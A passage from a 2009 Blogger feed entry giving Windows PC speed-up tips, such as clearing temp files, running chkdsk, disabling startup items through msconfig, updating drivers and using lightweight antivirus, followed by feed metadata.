margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; text-align: justify; "&gt;&lt;/div&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 15px; padding-left: 0px; text-align: justify; "&gt;&lt;strong style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;&lt;span style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; text-decoration: underline; "&gt;4. Delete Temporary, Junk and Obsolete files/Clear cache:&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;&lt;div style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; text-align: justify; "&gt;&lt;/div&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 15px; padding-left: 0px; text-align: justify; "&gt;Clean all your drives for free space, i personally recommend keep atleast 20% of your drive space free. Also, you have to clear the windows TEMP files, the web browsers temporary files, caches files, etc. All web browsers has that option.CCleaner will be a good choice for the same, it will analyze and clean all unwanted internet files, Windows Explorer files and system files.&lt;/p&gt;&lt;div style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; text-align: justify; "&gt;&lt;/div&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 15px; padding-left: 0px; text-align: justify; "&gt;&lt;strong style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;&lt;span style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; text-decoration: underline; "&gt;5. Check Disk for errors:&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;&lt;div style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; text-align: justify; "&gt;&lt;/div&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 15px; padding-left: 0px; text-align: justify; "&gt;Scan your disk for errors regularly. There may be some lost fragments or links which may lead to error in application. Run Scandisk once a week to keep things running smoothly. the error checking utility in windows will scan and attempt to recover bad sectors. Open &lt;em style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;My Computer&lt;/em&gt; &gt; Right click the drive &gt;&lt;em style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;Properties&lt;/em&gt; &gt; &lt;em style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;Tools&lt;/em&gt; &gt; click &lt;em style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;Check Now&lt;/em&gt; Button. Else simply type &lt;strong style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;chkdsk /r&lt;/strong&gt; at the command prompt.&lt;/p&gt;&lt;div style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; text-align: justify; "&gt;&lt;/div&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 15px; padding-left: 0px; text-align: justify; "&gt;&lt;strong style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;&lt;span style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; text-decoration: underline; "&gt;6. Remove Startup items:&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;&lt;div style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; text-align: justify; "&gt;&lt;/div&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 15px; padding-left: 0px; text-align: justify; "&gt;Removing unwanted startup programs will speedup the windows boot process and your desktop will be ready quickly. some programs like Limewire or MSN messenger take time to load at startup, you can remove those and run them when needed.to remove Startup items: Start &gt; Run &gt; type msconfig &gt; press OK. Now in the&lt;em style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt; System Configuration Utility&lt;/em&gt; uncheck the unwanted programs (better Disable All).&lt;/p&gt;&lt;div style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; text-align: justify; "&gt;&lt;/div&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 15px; padding-left: 0px; text-align: justify; "&gt;&lt;strong style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;&lt;span style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; text-decoration: underline; "&gt;7. Remove unnecessary Programs:&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;&lt;div style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; text-align: justify; "&gt;&lt;/div&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 15px; padding-left: 0px; text-align: justify; "&gt;Remove those programs which you don’t use anymore. This will free disk space and even help windows perform better. Also, remove the windows unwanted components like Indexing services &amp;amp;Outlook Express from the Add/Remove windows programs.&lt;/p&gt;&lt;div style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; text-align: justify; "&gt;&lt;/div&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 15px; padding-left: 0px; text-align: justify; "&gt;&lt;strong style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;&lt;span style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; text-decoration: underline; "&gt;8. Keep PC updated:&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;&lt;div style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; text-align: justify; "&gt;&lt;/div&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 15px; padding-left: 0px; text-align: justify; "&gt;Look for regular updates, Enable Windows Updates, Updates includes major bugfixes which can be helpful. Look for new Service packs for better hardware compatibility. Update all device drivers, anti-virus programs and other applications. Hardware Manufactures keep updating their device drivers for better and smooth functioning. &lt;/p&gt;&lt;div style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; text-align: justify; "&gt;&lt;/div&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 15px; padding-left: 0px; text-align: justify; "&gt;&lt;strong style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;&lt;span style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; text-decoration: underline; "&gt;9. Remove unwanted visual effects:&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;&lt;div style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; text-align: justify; "&gt;&lt;/div&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 15px; padding-left: 0px; text-align: justify; "&gt;The animated windows and fading menus can slow down your pc unknowingly. You can remove those fading effects, Use windows classic style theme, remove the heavy graphic wallpaper(none), You can even lower the color quality( to medium 16-Bit) and lower the screen resolution. Lower the screen resolution, better the performance.&lt;/p&gt;&lt;div style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; text-align: justify; "&gt;&lt;/div&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 15px; padding-left: 0px; text-align: justify; "&gt;&lt;strong style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; "&gt;&lt;span style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; text-decoration: underline; "&gt;10.Use Lightweight programs:&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;&lt;div style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; text-align: justify; "&gt;&lt;/div&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 15px; padding-left: 0px; text-align: justify; "&gt;Replace all those resource consuming programs and look for better alternatives, especially for those who have RAM less then 512 and an old PIII machine.&lt;/p&gt;&lt;div style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; text-align: justify; "&gt;&lt;/div&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 15px; padding-left: 0px; text-align: justify; "&gt;use Lightweight antivirus programs like Avira...the best i found, NOD32, AVG instead of Norton Antivirus.&lt;/p&gt;&lt;div style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; text-align: justify; "&gt;&lt;/div&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 15px; padding-left: 0px; text-align: justify; "&gt;This will really help you improve performance and helped me speed up my pc/computer.Try these out to improve your computer speed and performance.
&lt;/p&gt;&lt;div style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; text-align: justify; "&gt;&lt;/div&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 15px; padding-left: 0px; text-align: justify; "&gt;Hey guys...if you have any additional tips to improve slow pc performance, then just mention it below in comments section.&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 15px; padding-left: 0px; text-align: justify; "&gt;
&lt;/p&gt;&lt;p style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: 0px; padding-bottom: 15px; padding-left: 0px; text-align: justify; "&gt;Njoy..!!&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7814885976389384260-4399264468524573594?l=hackerhubz.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerhubz.blogspot.com/feeds/4399264468524573594/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/10-ways-to-speed-up-slow-computer.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/4399264468524573594'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7814885976389384260/posts/default/4399264468524573594'/><link rel='alternate' type='text/html' href='http://hackerhubz.blogspot.com/2009/10/10-ways-to-speed-up-slow-computer.html' title='10 ways to speed up slow computer'/><author><name>Pratik Mishra</name><uri>http://www.blogger.com/profile/07471524985759890554</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_5rpSJrmeITE/SsdePIkdcMI/AAAAAAAAABY/Xh7KoNtYjnQ/s72-c/imagem_wallpaper_xp-gloss_15.jpg' height='72' width='72'/><thr:total>0</thr:total></entry></feed>
